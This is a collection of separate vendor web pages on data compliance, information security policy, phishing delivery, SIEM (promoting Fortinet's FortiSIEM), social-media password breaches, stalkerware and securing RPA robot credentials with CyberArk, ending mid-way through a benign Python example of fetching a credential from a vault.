Taking care to follow key data security and compliance strategies goes a long way to ensuring data compliance. Consider these four foundational data compliance guidelines at the core of these strategies:
- Continuously check for changes in laws and regulations related to data compliance. Software solutions are available to provide notifications about updates, but someone needs to be responsible for ensuring that any necessary changes are made.
- Identify and leverage third-party expertise. Find the best technology and people to support data compliance programs.
- Create processes and policies that ensure that employees support data compliance programs. Following data compliance best practices that integrate with employees’ workflows helps to make data compliance programs successful.
- Do not wait for external audits to assess data compliance. Regular internal audits are the best way to identify and remediate data compliance gaps.
Data Compliance Frameworks
A data compliance framework is a set of guidelines and best practices that helps organizations adhere to regulatory requirements. These are designed around specific laws and regulations, such as PCI DSS, HIPAA, and GDPR.
A data compliance framework provides direction on technical requirements, such as:
- Access control
- Incident response
- Perimeter defense
- Risk management
It also offers guidance for how data compliance should be managed across the organization to meet requirements.
Committing to Data Compliance
Data compliance requires a concerted commitment backed up with robust programs. Take the time to identify the right resources—people and technology—to meet data compliance requirements. In addition to avoiding penalties for violations, data compliance provides greater visibility and access to data to power analytics that deliver valuable insights.
Egnyte has experts ready to answer your questions. For more than a decade, Egnyte has helped more than 16,000 customers with millions of users worldwide. | <urn:uuid:f0e3f172-0a61-484c-a9d0-012d6abe013e> | CC-MAIN-2022-40 | https://www.egnyte.com/guides/governance/data-compliance | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00402.warc.gz | en | 0.908545 | 2,407 | 3.09375 | 3 |
11 Key Elements of an Information Security Policy
An information security policy is a set of rules and guidelines that dictate how information technology (IT) assets and resources should be used, managed, and protected. It applies to all users in an organization or its networks as well as all digitally stored information under its authority. An information security policy addresses threats and defines strategies and procedures for mitigating IT security risks.
There are many components of an information security policy. Fundamental elements include:
- Information security roles and responsibilities
- Minimum security controls
- Repercussions for breaking information security policy rules
“An information security policy is an aggregate of directives, regulations, rules, and practices that prescribes how an organization manages, protects, and distributes information.” (The National Institute of Standards and Technology, NIST)
What is an Information Security Policy?
Since organizations have different structures and requirements, IT departments should create an information security policy that is optimal for operational teams and users. The policy should also provide the guidance required to comply with regulatory requirements—corporate, industry, and government.
An information security policy should clearly define the organization’s overall cybersecurity program’s objectives, scope, and goals. This creates a solid foundation for the policy and provides context to the specific rules that employees must follow.
While there are common elements across information security policies, each policy should reflect consideration of the unique operational aspects and specific threats related to an industry, region, or organizational model that can put IT resources and data at risk. For example:
- Industry:
  - Healthcare-related organizations must meet strict Protected Health Information (PHI) data protection standards set forth by HIPAA.
  - Manufacturing companies have to protect and monitor remote internet of things (IoT) devices.
  - Life sciences organizations must meet strict requirements related to electronic documents and signatures (Title 21 CFR Part 11).
- Region:
  - Local regulations
  - Adverse weather conditions—e.g., hurricanes, tornadoes
  - Physical threats related to conflict
- Organizational model:
  - Remote offices
  - Field staff
  - Contract workforce
An information security policy should be a living document, reviewed and updated regularly to consider new or changing threats, processes, and regulations. This has several benefits:
- Demonstrates that the organization considers information security a high priority
- Keeps security protocols up to date and ready to effectively address threats and meet compliance requirements
- Provides accurate direction for issue resolution, disaster recovery, and overall security management
- Reduces the risk of reduced productivity, financial loss, and damage to reputation in the event of a security incident
The Importance of an Information Security Policy
An information security policy helps everyone in the organization understand the value of the security measures that IT institutes, as well as the direction needed to adhere to the rules. It also articulates the strategies in place and steps to be taken to reduce vulnerability, monitor for incidents, and address security threats.
An information security policy provides clear direction on procedure in the event of a security breach or disaster.
Important outcomes of an information security policy include:
Facilitates the confidentiality, integrity, and availability of data
A robust policy standardizes processes and rules to help organizations protect against threats to data confidentiality, integrity, and availability.
Reduces the risk of security incidents
An information security policy outlines procedures for identifying, assessing, and mitigating security vulnerabilities and risks. It also explains how to quickly respond to minimize damage in the event of a security incident.
Executes security programs across an organization
To ensure successful execution, a security program needs an information security policy to provide the framework for operationalizing procedures.
Provides clear statement of security policy to third parties
The policy summarizes the organization’s security posture and details how it protects IT assets and resources. It allows organizations to quickly respond to third-party (e.g., customers’, partners’, auditors’) requests for this information.
Helps to address regulatory compliance requirements
The process of developing an information security policy helps organizations identify gaps in security protocols relative to regulatory requirements.
11 Elements of an Information Security Policy
An information security policy should be comprehensive enough to address all security considerations. It must also be accessible; everyone in the organization must be able to understand it.
Boilerplate information security policies are not recommended, as they inevitably have gaps related to the unique aspects of your organization. The information security framework should be created by IT and approved by top-level management.
A robust information security policy includes the following key elements:
- 1. Purpose
- 2. Scope
- 3. Timeline
- 4. Authority
- 5. Information security objectives
- 6. Compliance requirements
- 7. Body—to detail security procedures, processes, and controls in the following areas:
- Acceptable usage policy
- Antivirus management
- Backup and disaster recovery
- Change management
- Cryptography usage
- Data and asset classification
- Data retention
- Data support and operations
- Data usage
- Email protection policies
- Identity and access management
- Incident response
- Insider Threat Protection
- Internet usage restrictions
- Mobile device policy
- Network security
- Password and credential protocols
- Patch management
- Personnel security
- Physical and environmental security
- Ransomware detection
- System update schedule
- Wireless network and guest access policy
- 8. Enforcement
- 9. User training
- 10. Contacts
- 11. Version history
Information Security Policy Best Practices
Established best practices for an information security policy lead with obtaining executive buy-in. Implementation and enforcement are much easier and more effective when the policy has the support of top leadership.
Other best practices for information security policy development include:
- Establish objectives.
- Identify all relevant security regulations—corporate, industry, and government.
- Customize the information security policy.
- Align the policy with the needs of the organization.
- Inventory all systems, processes, and data.
- Identify risks.
- Assess security related to systems, data, and workflows.
- Document procedures thoroughly and clearly.
- Review procedures carefully to ensure they are accurate and complete.
- Train everyone who has access to the organization's data or systems on the rules that are outlined in the information security policy.
- Review and update the policy regularly.
Take Information Security Policy Development Seriously
A well-developed information security policy helps improve an organization’s security posture by raising awareness. It also provides the guidance needed to include all users in baseline security preparedness that ultimately protects your organization’s data and systems. Investing in the development and enforcement of an information security policy is well worth the effort.
Egnyte has experts ready to answer your questions. For more than a decade, Egnyte has helped more than 16,000 customers with millions of users worldwide.
Last Updated: 12th July, 2021 | <urn:uuid:0f9d783b-2376-43b5-a94b-d7f2df99acae> | CC-MAIN-2022-40 | https://www.egnyte.com/guides/governance/information-security-policy | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00402.warc.gz | en | 0.891758 | 1,435 | 3.125 | 3 |
Most threat actors today are more sophisticated than they were before. An organization often finds out about a cyber attack on its network only in the late stages of the attack, when the damage has already been done. However, one of the most critical stages in the cyber kill chain is the delivery of the malware.
Over the years, threat actors have developed many malware delivery techniques, but one method that has remained popular throughout the years is the phishing attack. A phishing attack is a social engineering attack in which a threat actor sends a fraudulent message to trick victims into exposing sensitive information or “opening a door” that will let the attacker into the organization’s network.
According to the most recent statistics from 2021, at least 91% of cyber attacks begin with phishing. End-users appear to be the weakest link in the cyber security chain, and threat actors know it.
Phishing attacks might be delivered by:
- Email – containing a malicious attachment or a link to a malicious website.
- Website – usually a copy of the login page of a legitimate website (such as PayPal, eBay, etc.).
- SMS – redirecting a victim to a fake website or malicious download page.
- Well-known social networks like Twitter, Facebook or LinkedIn – for example, a request to download a job candidate’s resume, or a fake login page that harvests the user’s credentials by offering coupons and discounts.
The most common delivery method is an email attachment pretending to be an invoice or, reflecting the hot topic of the past year, an email about COVID-19. The attachment is usually a macro-embedded Excel or Word document, since most organizations use a mail-relay product to prevent malicious executables of any kind from entering the internal network. The purpose of the macro is typically to download a malicious payload from a remote command-and-control server and execute it.
Popular malware families delivered through phishing attacks include Trickbot, Emotet, and Ursnif.
Minerva Labs has a unique approach to phishing attacks. Our simulation technology prevents malicious activity by Microsoft Office products, including the subsequent payload delivery and execution.
Figure 1 – Malicious excel file uses eqnedt32.exe to execute arbitrary code | <urn:uuid:8da5b438-97e6-4a86-ae9f-2b1e05daa4d6> | CC-MAIN-2022-40 | https://minerva-labs.com/blog/phishing-attacks-and-minerva-armor/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00402.warc.gz | en | 0.925005 | 537 | 2.515625 | 3 |
What Is SIEM?
And why is it a critical security tool?
What is SIEM?
The definition of security information and event management, or SIEM, according to TechTarget, is “an approach to security management that combines SIM (security information management) and SEM (security event management) functions into one security management system.”
Security information and event management systems address the three major challenges that limit rapid incident response:
- The vast amount of unaggregated security data makes it hard to see what’s happening and prioritize threats.
- IT teams are understaffed/undertrained due to the cybersecurity skills gap.
- The need to demonstrate compliance takes time away from threat identification and response.
What is SIEM? Next-Level Architecture Explained
SIEM systems are critical for organizations mitigating an onslaught of threats. With the average organization’s security operations center (SOC) receiving more than 10,000 alerts per day, and the biggest enterprises seeing over 150,000, most enterprises do not have security teams large enough to keep up with the overwhelming number of alerts. However, the growing risk posed by ever more sophisticated cyber threats makes ignoring alerts quite dangerous. A single alert may mean the difference between detecting and thwarting a major incident and missing it entirely. SIEM security delivers a more efficient means of triaging and investigating alerts. With SIEM technology, teams can keep up with the deluge of security data.
Security information and event management (SIEM) solutions collect logs and analyze security events along with other data to speed threat detection and support security incident and event management, as well as compliance. Essentially, a SIEM technology system collects data from multiple sources, enabling faster response to threats. If an anomaly is detected, it might collect more information, trigger an alert, or quarantine an asset.
While SIEM technology was traditionally used by enterprises and public companies that needed to demonstrate compliance, those organizations have come to understand that security information and event management is much more powerful. SIEM technology has since evolved into a key threat detection tool for organizations of all sizes. Given the sophistication of today’s threats, and the fact that the cybersecurity skills shortage is not improving, it is critical to have security information and event management that can quickly and automatically detect breaches and other security concerns. These capabilities are driving more small and medium-sized organizations to deploy a SIEM solution as well.
How Does SIEM Work?
Some organizations may still be wondering, “What does SIEM do?” SIEM technology gathers security-related information from servers, end-user devices, networking equipment, and applications, as well as security devices. Security event and information management (SIEM) solutions sort the data into categories and when a potential security issue is identified, can send an alert or respond in another manner, according to pre-set policies. The aggregation and analysis of data gathered throughout the network enable security teams to see the big picture, identify breaches or incidents in the early stages, and respond before damage is done.
SIEM systems ingest and interpret logs from as many sources as possible including:
- Firewalls/unified threat management systems (UTMs)
- Intrusion detection systems (IDS) and intrusion prevention systems (IPS)
- Web filters
- Endpoint security
- Wireless access points
- Application servers
SIEM systems look at both event data and contextual data from these logs for analysis, reports, and monitoring. IT teams can effectively and efficiently respond to security incidents based on these results.
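To make the idea of cross-source correlation concrete, here is a deliberately simplified Python sketch of the kind of rule a SIEM engine evaluates: it aggregates failed-login events parsed from several log sources and raises an alert when one account fails too often within a short window. This is an illustration of the concept only, not how any particular SIEM product is implemented, and the field names, sources, and threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Normalized events as a SIEM might store them after parsing logs from
# firewalls, VPN gateways, and application servers (field names are assumed).
events = [
    {"time": datetime(2021, 7, 1, 9, 0, 5),  "source": "vpn",      "user": "jdoe",   "action": "login_failed"},
    {"time": datetime(2021, 7, 1, 9, 0, 40), "source": "webmail",  "user": "jdoe",   "action": "login_failed"},
    {"time": datetime(2021, 7, 1, 9, 1, 10), "source": "firewall", "user": "jdoe",   "action": "login_failed"},
    {"time": datetime(2021, 7, 1, 9, 2, 0),  "source": "webmail",  "user": "asmith", "action": "login_ok"},
]

WINDOW = timedelta(minutes=5)   # correlation window
THRESHOLD = 3                   # failed attempts that trigger an alert

def correlate_failed_logins(events):
    """Alert when one user fails to log in THRESHOLD times, across any sources, within WINDOW."""
    failures = defaultdict(list)
    for event in sorted(events, key=lambda e: e["time"]):
        if event["action"] != "login_failed":
            continue
        # Keep only this user's failures that fall inside the sliding window.
        recent = [t for t in failures[event["user"]] if event["time"] - t <= WINDOW]
        recent.append(event["time"])
        failures[event["user"]] = recent
        if len(recent) >= THRESHOLD:
            yield f"ALERT: {event['user']} had {len(recent)} failed logins across sources by {event['time']}"

for alert in correlate_failed_logins(events):
    print(alert)
```

A production SIEM applies thousands of such rules, enriched with asset and identity context, across far larger event volumes; the value lies in doing this continuously and across every source at once.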
Why SIEM: Critical Benefits
Security information and event management solutions provide key threat-detection capabilities, real-time reporting, compliance tools, and long-term log analysis. The top benefits are:
- Increased security effectiveness and faster response to threats. To be useful, a security and event management solution must “enable an analyst to identify and respond to suspicious behavior patterns faster and more effectively than would be possible by looking at data from individual systems,” according to the SANS Institute. To be truly effective, it must be able to prevent successful breaches.
- Efficient compliance demonstration. SIEM technology should also make it easy for SIEM IT teams to track and report compliance with industry and governmental regulations and security standards.
- Significant reduction in complexity. Consolidating security event data from multiple applications and devices enables fast and comprehensive analysis. In addition, repetitive tasks are automated and tasks that previously required experts can be performed by less experienced staff.
Choosing a SIEM Vendor: Your Buying Guide
“The global security information and event management market accounted for $2.59B in 2018 and is expected to grow at a CAGR of 10.4% during the forecast period 2019 - 2027, to $6.24B by 2027,” according to a recent SIEM report by Research and Markets.
This fast-growing market feeds a lot of competition, so it’s important to know what to look for in a security information and event management solution. At the very least, a SIEM solution must be able to:
- Collect data from every security device
- Aggregate, correlate, and analyze the data
- Automate wherever possible
- Monitor business services, not just devices
For more details on what really matters when selecting a SIEM solution, read the eBook.
Most organizations will want more than just basic functionality from a security information and event management solution. The following checklist provides guidance on specific features that will maximize return on investment (ROI):
Seamless integration into existing security and network architectures
Whether the security architecture is based on the Fortinet Security Fabric or a multi-vendor environment, a security information and event management solution must integrate seamlessly. It needs to be able to automatically discover and ingest data from numerous security and IT devices, including those that are region-specific or industry-specific.
At the outset, it must include flexible deployment options, rapid deployment, and be easily customizable, without the need for extensive professional services.
The solution also must be able to scale with business growth.
High-fidelity, prioritized alerts
Without event correlation and analysis, even consolidated data is worthless. The SIEM solution must use multiple methods to determine what conclusions should be drawn from the data.
Also, key is to employ an intelligent infrastructure and application discovery engine that automatically maps the topology of both physical and virtual infrastructure, on-premises and in public/private clouds, providing context for event analysis. This eliminates the wasted time and errors that can occur when this information is added manually.
Further, a top SIEM solution will correlate user identities with their network (IP) addresses and devices. This event context, together with robust rule sets and advanced analytics, enables threat prioritization, flagging those that require immediate attention. As a result, administrators can address high-risk events promptly and offload low-risk events to automated response processes.
Automated incident mitigation
An ideal SIEM solution uses security orchestration automation and response (SOAR) to orchestrate the appropriate response through multi-vendor security devices. It can respond automatically or alert a human operator, depending on the event’s level of risk and complexity. This flexibility helps organizations achieve the right balance of response speed and human oversight in the face of explosive growth in security data and the acceleration of threats.
High-value business insights from a single pane of glass
Typical security information and event management solutions do not present event information in a business context. However, this is very useful and should be included. For example, a SIEM dashboard could be configured to present the status of the company’s e-commerce service, rather than the status of the individual devices—servers, networking equipment, and security tools—that support that service. This enables the security team to deliver meaningful updates to the lines of business.
Alternatively, security administrators can quickly see which business services would be impacted if a particular device were unavailable or compromised. Most importantly, a single staff member can oversee all security information and event management activities from a central console.
Compliance-ready reporting
A solution with pre-defined reports supporting a wide range of compliance auditing and management needs including PCI-DSS, HIPAA, SOX, NERC, FISMA, ISO, GLBA, GPG13, and SANS Critical Controls helps security teams that have also taken on compliance duties. SIEM security teams can save time and minimize compliance training. Meeting audit/reporting deadlines without having to acquire in-depth knowledge of regulations and reporting content requirements is also advantageous.
Why Fortinet FortiSIEM?
Security management only gets more complex as more applications, endpoints, IoT devices, cloud deployments, virtual machines, etc. are added to the network. To secure this exploding attack surface requires visibility of all devices and all the infrastructure—in real time. But context is also needed. Organizations need to know what devices represent a threat and where.
Fortinet’s security information and event management system, FortiSIEM, brings together visibility, correlation, automated response, and remediation in a single, scalable solution. FortiSIEM reduces the complexity of managing network and security operations to effectively free resources, improve breach detection, and even prevent breaches. What’s more is that Fortinet’s architecture enables unified data collection and analytics from diverse information sources including logs, performance metrics, security alerts, and configuration changes. FortiSIEM essentially combines the analytics traditionally monitored in separate silos of the security operations center (SOC) and network operations center (NOC) for a more holistic view of the security and availability of the business.
Top features of FortiSIEM include:
- Asset self-discovery to reduce false positives by understanding a device’s contextual capabilities
- Rapid integrations and scalability with network-aware and vendor-agnostic operations and management to enable a real-time business view of availability, utilization, and security posture
- Automated workflow driven by a leading security orchestration and automated response engine (SOAR) to quickly respond to threats
- Single-pane-of-glass view that brings teams together to swiftly remediate service issues
The FortiSIEM security information and event management solution goes beyond the considerations of a typical solution on the market. Besides including seamless integration, high-fidelity, prioritized alerts, automated incident mitigation, high-value business insights from a single pane of glass, and compliance-ready reporting it has a number of other essential capabilities.
FortiSIEM’s value is summed up by eWeek: “This solution provides core SIEM capabilities in addition to complementary features that include a built-in configuration management database (CMDB), file integrity monitoring (FIM), and application and system performance monitoring.” The FortiSIEM CMDB engine automatically discovers all the elements (devices, applications, users, IoT devices, etc.) connected to the network, and their respective interrelationships. The SIEM delivers a comprehensive and holistic topology map that continues to self-learn and report on any changes beyond the initial baseline.
FortiSIEM is available in a number of form factors to fit smoothly into any network architecture: hardware appliances, virtual machines, and on Amazon Web Services (AWS). Physical appliances with varying levels of performance are available to provide a variety of options. The FortiSIEM architecture is a scale-out, enterprise- and service provider-ready, multitenant framework. Each FortiSIEM Collector can monitor more than 10,000 security events per second (EPS) and more than 1,000 devices for high performance and availability.
Enterprise Strategy Group (ESG) performed an in-depth examination of FortiSIEM’s capabilities and effectiveness in a SIEM technical validation test. ESG Lab confirmed that Fortinet’s FortiSIEM “delivers context, visibility, and rapid response by cross-correlating security, performance, and availability data from heterogeneous systems. This enables a security organization to discover, investigate, and respond to security, performance, and availability events rapidly, which provides the tools needed to address incidents completely with swift, focused, confident action. By shortening the time from detection to resolution, organizations can shave valuable time off their remediation processes, saving not just time, but effort, and money.”
The test concluded, “FortiSIEM’s unique capabilities in cybersecurity and IT operations management provide the real-time and historical analytics—with correlated context—needed for organizations to confidently detect and resolve anomalous activity and incidents and preserve business continuity.”
Learn more about Fortinet FortiSIEM. | <urn:uuid:fa4c3c17-2b3d-4a63-9d2c-ca7f2add2979> | CC-MAIN-2022-40 | https://www.fortinet.com/de/resources/cyberglossary/what-is-siem | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00402.warc.gz | en | 0.921182 | 2,638 | 2.8125 | 3 |
Last week, social feeds and web articles flooded the Internet with news of a major password hack at the professional networking site LinkedIn. It was reported that a Russian hacker breached over 6.46 million accounts. The company released an apology and is still working on repairing the damage. Just when things were starting to settle down, reports stated that the very same hacker had accessed more than 1.5 million accounts on the dating site eHarmony.com. Although this was significantly less, the concerns were just as high, if not worse. How could this be happening all over the web? Social media poses a huge threat beyond just the overabundance of personal information people share on these sites. Eric Knapp, VP of Client Services, says, “All social media accounts require an email. Once a hacker has an email address and a password, it’s easy enough to continue hacking other accounts.”

Users also make themselves vulnerable to multiple attacks by using the same passwords for every account. Unfortunately, this finding was not publicized soon enough, and this is not the end of the story.

Just this week, 10,000 Twitter accounts were reported as being hacked via a Twitter app. This breach made profiles, full names, passwords, and locations all public information after a group of hackers got into the system. All the sites that have been hacked this month have issued public statements and urged their users to change their passwords. This has become a pretty standard procedure, and it has proven not to protect users. If these accounts were hacked before, what difference does a new password make the next time?

Social media sites and other sites that require users to form an account need to look deeper into preventing Internet fraud by enforcing better security measures. A password should be the bare minimum, not the solution. Integrating identity verification could help reduce the amount of online hacking. This would require criteria beyond an email and password in order to access account information. The more common password hacking becomes, the easier it gets for attackers and the harder it becomes to prevent. Sites that want to stay ahead of the security curve need to consider building a wall between entering login information and accessing the account by investing in outside security measures. This will help prevent future hackings and unsatisfied customers.
[Contributed by, EVS Marketing] | <urn:uuid:65ba899e-c922-469b-8d5b-e736e438483f> | CC-MAIN-2022-40 | https://www.electronicverificationsystems.com/blog/Social-Media-Poses-Serious-Security-Threats | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00402.warc.gz | en | 0.948525 | 489 | 2.59375 | 3 |
Stalkerware refers to tools, apps, software programs, and devices that let another person (a stalker) secretly watch and record information on another person’s device. Parents use this type of tool to keep an eye on their children. Criminals often use such software for invasive and intrusive spying on individuals of interest.
Stalkerware can see and monitor many things on your mobile device, including the photos and videos you take, web browser history, text message conversations, call history, and even your location. Stalkerware with privileged access to your device can turn on your webcam or microphone, take screenshots, see activity in third-party apps (such as Snapchat or WhatsApp), and intercept, forward, or even record phone calls.
Smartphone stalkerware tools typically require a hacker to have physical access to your device to install the malware. Once installed, it runs in stealth mode without any notification to the end-user of the device that it is present. Stalkerware is difficult to detect and remove.
What does this mean for an SMB?
Stalkerware, as well as other cyber threats, often get into your systems through end-users. Studies show that 90% of cyber-attacks are caused by human error where your users succumb to phishing or social engineering attacks. It’s so important for you to help employees avoid human errors. Follow CyberHoot’s best practices to avoid, prepare for, and prevent damage from cyber attacks:
- Adopt two-factor authentication on all critical Internet-accessible services
- Adopt a password manager for better personal/work password hygiene
- Require 14+ character Passwords in your Governance Policies
- Follow a 3-2-1 backup method for all critical and sensitive data
- Train employees to spot and avoid email-based phishing attacks
- Check that employees can spot and avoid phishing emails by testing them
- Document and test Business Continuity Disaster Recovery (BCDR) plans
- Perform a risk assessment every two to three years
Start building your robust, defense-in-depth cybersecurity plan at CyberHoot.
To learn more about Stalkerware, watch this short 3-minute video:
CyberHoot does have some other resources available for your use. Below are links to all of our resources, feel free to check them out whenever you like:
- Cybrary (Cyber Library)
- Press Releases
- Instructional Videos (HowTo) – very helpful for our SuperUsers!
Note: If you’d like to subscribe to our newsletter, visit any link above (besides infographics) and enter your email address on the right-hand side of the page, and click ‘Send Me Newsletters’. | <urn:uuid:10e73f88-60e2-435c-9e7d-262d2ce58104> | CC-MAIN-2022-40 | https://cyberhoot.com/cybrary/stalkerware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00602.warc.gz | en | 0.907939 | 577 | 2.53125 | 3 |
Automotive data is information about vehicles and their users. The range of data is wide: vehicle type, model, movement patterns and speed, road hazards, and more are available for car owners, dealerships, manufacturers, and city planners.
Some basic automotive data like model, make, and year comes from companies and dealerships. Newer cars, however, come equipped with data collection devices that measure car location, speed, time since the last maintenance check, distance from road hazards and gas stations, and more.
Other sources of this data include accident reports, insurance claims, sources like Ward’s Automotive Yearbook, surveys, and apps like Waze.
Most datasets include vehicle type, model, and year. These may include data on fuel efficiency, emissions, safety, and location. However, there are micro and nano-level datasets for specific purposes. These datasets provide information about specific components of a vehicle that manufacturers and safety testers need.
In short, the attributes of your dataset depend on your need.
Many different types of people use automotive data. Car owners use it to determine whether their vehicle runs efficiently or whether a new purchase would suit their needs. Manufacturers and marketers use the data to determine whether they should improve vehicle quality or change marketing campaigns. App developers combine the automotive data with geospatial data to advertise local gas stations or other points of interest. City planners use the data to plan public transportation routes and determine where to build parking lots or which roads are most unsafe.
With more technological advances in the automotive industry as well as pressures to keep intellectual properties confined to one company, testing automotive data is a daunting task. However, the risks of faulty data can be dire. For this reason, you or your data vendor should first ensure that the dataset is complete, updated frequently, and that the data-measuring devices within the vehicle are in good shape. Second, you should ensure the dataset is properly cleaned to be as accurate as possible. Finally, you or your vendor should build safeguards into your data management systems to flag anomalies as soon as possible.
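As a simple illustration of that last safeguard, the Python sketch below flags rows in a vehicle telemetry table whose values fall outside plausible ranges. The column names, thresholds, and toy data are assumptions made for the example; a real pipeline would encode rules agreed with the data vendor and run them automatically on every refresh.

```python
import pandas as pd

# Toy vehicle dataset; column names and values are illustrative assumptions.
vehicles = pd.DataFrame({
    "vehicle_id": ["A1", "B2", "C3", "D4"],
    "model_year": [2018, 2021, 1899, 2019],   # 1899 is clearly invalid
    "speed_kmh":  [87.0, 452.0, 63.5, None],  # 452 km/h is implausible; one value is missing
})

def flag_anomalies(df: pd.DataFrame) -> pd.DataFrame:
    """Return rows that violate basic plausibility rules."""
    plausible = (
        df["model_year"].between(1950, 2023)   # plausible model years
        & df["speed_kmh"].between(0, 300)      # plausible road speeds; missing values fail the check
    )
    return df[~plausible]

print(flag_anomalies(vehicles))
# Rows B2 (speed too high), C3 (invalid model year), and D4 (missing speed) are flagged.
```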
“Less data transfer allows for quicker processing, lower latency, and uses less power. In effect, this is like SMS between vehicles.”
“But how it will hold up over time isn’t clear. “When it comes to failure rates and design for life, we are just beginning — along with many of the other challenges with autonomous driving and ride sharing — to look at what it means to have people drive cars more than an hour and half a day,” said Lance Williams, vice president for automotive strategy at ON Semiconductor. “This could be a ‘driving 22 hours a day’ type of scenario.”’
X-Byte’s dataset – ‘X-Byte | Car Rental Data – Global Coverage – Datasets Spanning All Major Car Rental Sites & Aggregators’ provides Retail & Commerce Data, Automotive Industry Data and GPS Data that can be used in Price Segmentation Strategy, Pricing Optimization and
TRAK Data’s dataset – ‘TRAK Data – Full US Consumer Automotive Data – Reach Vehicle Owners, In-Market Auto Shoppers, Target by Make, Model, Year, New, Used, Geography’ provides Marketing Attribution Data, Automotive Industry Data, Individual Data, and Consumer Lifestyle Data that can be used in and Targeted Marketing
TagX’s dataset – ‘Image Dataset of Cars with highlighted Damages’ provides Automotive Industry Data and Economic Data that can be used in | <urn:uuid:29814ad9-beda-4439-b3a2-30ed6a90f5a7> | CC-MAIN-2022-40 | https://www.data-hunters.com/category/industry-specific-data/automotive-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00602.warc.gz | en | 0.919595 | 741 | 2.953125 | 3 |
The ILO (International Labour Organization) estimates that there are 40.3 million people in modern slavery in the world today, including 24.9 million in forced labour.
As globalisation creates more opportunities for organisations to secure cheaper supplies, the risk of exploitation in supply chains increases.
In the UK, the MSA (Modern Slavery Act) 2015 sets out measures to combat modern slavery and trafficking. It applies to organisations that do business in the UK and have a global turnover of more than £36 million.
Section 54 of the Act, “Transparency in supply chains”, requires commercial organisations to publish a slavery and human trafficking statement for each financial year.
The Home Office’s guidance recommends that your statement covers the following:
- Your organisation’s structure, its business and its supply chains
- Your policies in relation to slavery and human trafficking
- Your due diligence processes in relation to slavery and human trafficking
- The parts of your business and supply chains where there is a risk of slavery and human trafficking, and the steps taken to assess and manage that risk
- Your effectiveness in ensuring that slavery and human trafficking are not taking place, measured against appropriate performance indicators
- The training about slavery and human trafficking available to your staff
You can use these six areas to demonstrate that your organisation is acting ethically and in line with the law.
Help your employees understand what modern slavery is, its global impact and how it affects your organisation with our Modern Slavery Staff Awareness E-learning Course. | <urn:uuid:6427dd6c-6778-4a0c-afdf-bbc926f9e554> | CC-MAIN-2022-40 | https://www.grcelearning.com/topic/modern-slavery | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00602.warc.gz | en | 0.909045 | 211 | 2.90625 | 3 |
Robotic Process Automation (RPA) is a powerful, emerging technology and a hot topic of conversation. Despite the buzz, many people remain fuzzy on understanding the specifics. Does RPA mean that organizations will soon employ armies of futuristic robots to do the work that humans once did (remember the movie I, Robot)?
Not quite. Let’s start with a definition. RPA is “the use of software with artificial intelligence and machine learning capabilities to handle high-volume tasks that previously required a human to perform.” In other words, RPA uses “software robots” to automate much of the manual “hand work” involved in daily business, such as entering data (invoices, POs, etc.) from one application into another. What RPA does NOT focus on is the “head work,” or cognitive automation, required to extract information from unstructured sources. This is the work—and irreplaceable value—of humans in the organization. RPA is not meant to replace employees, but rather, allow them to leverage their experience and capabilities and focus their efforts on business-critical work. RPA simply fills in the gaps—providing 24×7, cross-geography support for time-consuming, repetitive tasks.
Here’s how a typical task could be automated by a “software robot:”
First, a single manual process is used to create a business process flow. The robots would then record that process. From there, any necessary rules, policies or exceptions to that process are identified and assigned to humans to manage. The robotic process is put into production and repeated over and over again. Throughout this loop, corrective actions are made to continuously refine the process and maximize operational efficiency, productivity and cost-savings.
RPA and Privilege Connection
So what do IT security professionals need to know about RPA platforms and the connection to privileged credentials? Simply put, it is a new attack vector and organizations need to protect the powerful, privileged accounts within these RPA platforms.
Because RPA software interacts directly with business applications and mimics the way applications use and mirror human credentials and entitlements, this can introduce significant risks when the software robots automate and perform routine business processes across multiple systems.
To minimize these risks, securing robotic credentials is paramount. In order to automate processes within an environment, software robots need “power access” (or privileged access) to carry out their mission—whether it be logging into a system(s) to access data or moving a process from step A to step B. This results in a large number of credentials being stored in the application. An attacker that gains access to the RPA password storage location and cracks the proverbial “password piñata” can then take the credentials and, ultimately, take control of the robots. Just like any other compromised commercial off-the-shelf (COTS) application, attackers can leverage these powerful credentials to do their bidding—but with RPA, it’s at an even greater scale. Most organizations employ multiple—sometimes hundreds or even thousands of—software robots, which access multiple systems and perform multiple processes simultaneously. With this in mind, you can appreciate the magnitude of risk to the enterprise.
Locking Down RPA Credentials
CyberArk solves the privileged access security challenge for both human and application users. Through the C3 Alliance, we’ve partnered with some of the world’s leading RPA players, including Automation Anywhere, BluePrism, WorkFusion and UiPath, to provide a simple, easy-to-deploy and cost-effective solution to this growing security challenge. This best-in-breed credential management solution:
- Implements and manages a unique account for every target system that needs to be accessed by a robot: This eliminates the need to put a powerful credential, such as a domain credential, into the application’s server for the robots to leverage. Additionally, if a system is breached, the breach will only affect that particular system—there will not be a larger, ripple effect across multiple systems.
- Securely stores and retrieves credentials: Instead of storing credentials within the application, robots can request credentials from CyberArk’s centralized, encrypted vault, as needed, via CyberArk Application Identity Manager, to perform their necessary tasks.
Here’s an illustration of this in action:
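In code terms, the retrieval step looks roughly like the sketch below. The vault URL, endpoint, and `get_robot_credential` helper are hypothetical placeholders for illustration only, not CyberArk’s actual API:

```python
import os
import requests

VAULT_URL = "https://vault.example.internal"  # hypothetical central credential vault

def get_robot_credential(target_system: str) -> dict:
    """Fetch a short-lived credential for a single target system at runtime.

    The robot never stores passwords itself; it authenticates to the vault
    (here with an API token from its runtime environment) and requests the
    one account scoped to the system it is about to touch.
    """
    response = requests.get(
        f"{VAULT_URL}/credentials/{target_system}",
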